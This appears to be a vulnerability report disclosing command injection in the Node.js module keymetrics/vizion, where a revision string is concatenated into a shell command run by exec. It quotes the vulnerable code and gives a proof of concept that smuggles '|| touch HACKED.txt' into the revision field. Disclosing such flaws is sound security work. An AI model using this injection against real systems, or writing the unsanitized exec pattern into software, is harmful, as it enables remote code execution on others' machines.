Code Injection in keymetrics/vizion
Valid
Reported on
Apr 3rd 2020
Overview
The issue is an RCE
triggerable via the module.
This is possible because in the https://github.com/keymetrics/vizion/blob/master/lib/git/git.js#L228 line, the git reset --hard
command is concatenated with a unsanitized input:
var command = cliCommand(args.folder, "git reset --hard " + args.revision);
The command
variable is so passed to the exec
function, declared as:
var exec = require('child_process').exec;
This makes possible any attacker to control the revision
attribute passed as object
in the <vizion_object>.revertTo()
function, leading to the RCE impact
.
Steps To Reproduce
- First of all, note you have to set accurately your
git
environment - Execute the following commands:
mkdir vizion # Makes a new directory where initialize *git*
cd vizion
git init
echo "TEST_STRING" > test.txt # Create a file named "test.txt"
git add test.txt # Adding to the working tree the new file
git commit
- Create a PoC file like this (in the
vizion
directory):
// poc.js
var vizion = require('vizion');
vizion.revertTo({
revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt', folder : '.' },
function(err, data) {
console.log(data);
});
- Start the
poc.js
file:node poc.js
- A file named
HACKED.txt
will be created {F580132}
Occurrences
References
to join this conversation